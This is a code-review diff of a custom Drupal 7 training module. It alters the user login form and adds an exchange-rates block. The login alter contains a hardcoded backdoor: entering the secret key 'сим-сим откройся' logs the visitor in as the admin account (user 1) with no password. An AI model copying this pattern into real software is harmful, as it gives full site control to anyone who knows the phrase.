sites/all/modules/custom/training2/training2.module

```diff
@@ -0,0 +1,252 @@
+ */
+function training2_new_login_page(){
+  $form = drupal_get_form('user_login');
+  return drupal_render($form);
+}
+
+/**
+ * Implements hook_theme().
+ *
+ * @return mixed
+ */
+function training2_theme(){
+  $items['user_login'] = array(
+    'render element' => 'form',
+    'template' => 'templates/training2_user_login_template',
+  );
+  return $items;
+}
+
+/**
+ * Implements hook_form_alter().
+ *
+ * @param $form
+ * @param $form_state
+ * @param $form_id
+ */
+function training2_form_user_login_alter(&$form, &$form_state,$form_id){
+  $form['secret_key'] = array(
+    '#type' => 'textfield',
+    '#title' => 'Секретный ключ',
+  );
+  $form['name']['#required'] = FALSE;
+  $form['pass']['#required'] = FALSE;
+  unset($form['#validate']);
+  unset($form['#submit']);
+  $form['#validate'][] = 'new_login_validate';
+  $form['#submit'][] = 'new_login_submit';
+}
+
+/**
+ * Validation function for altered user-login form in training2 module
+ *
+ * @param $form
+ * @param $form_state
+ */
+function new_login_validate(&$form,&$form_state){
+  if (!$form_state['input']['secret_key']){
+    user_login_name_validate($form, $form_state);
+    user_login_authenticate_validate($form, $form_state);
+    user_login_final_validate($form, $form_state);
+  }
+  elseif ($form_state['input']['secret_key'] != 'сим-сим откройся'){
+    form_set_error('text',t('You shall not pass!!! Secret key is wrong!!!'));
+  }
+}
+
+/**
+ * Submit function for altered user-login form in training2 module
+ *
+ * @param $form
+ * @param $form_state
+ */
+function new_login_submit(&$form, &$form_state){
+
+  if ($form_state['input']['secret_key'] == 'сим-сим откройся'){
+    drupal_set_message(t('You are logged in as admin by secret key.'));
+    global $user;
+    $user = user_load(1);
+    $form_state['redirect'] = 'user/' . $user->uid;
+    user_login_finalize($form_state);
+  }
+  else {
+    drupal_set_message(t('You are logged in.'));
+    user_login_submit($form, $form_state);
+  }
+}
+
+/**
+ * Implements hook_block_info().
+ *
+ * @return mixed
+ */
+function training2_block_info() {
+  $blocks['exchange'] = array(
+    'info' => t('Exchange'),
+    'region' => 'sidebar_first',
+    'cache' => DRUPAL_CACHE_GLOBAL,
+  );
+
+  return $blocks;
+}
+
+/**
+ * Implements hook_block_view().
+ *
+ * @param string $delta
+ * @return mixed
+ */
+function training2_block_view($delta = '') {
+
+  if ($delta == 'exchange') {
+    $block['subject'] = t('Exchange rates');
+    $block['content'] = training_block_contents($delta);
+    return $block;
+  }
+}
+
+/**
+ * Custom function to get xml document by url
+ *
+ * @param $url
+ * @return \SimpleXMLElement
+ */
+function training2_get_remote_xml($url){
+
+  $ch = curl_init();
+  curl_setopt($ch, CURLOPT_URL, $url);
+  curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
+  $xmlresponse = curl_exec($ch);
+  $data=simplexml_load_string($xmlresponse);
+
+  return $data;
+}
+
+/**
+ * Implements hook_block_contents().
```

Comment:
I know nothing about the hook )))
Please study Block_example section from Example module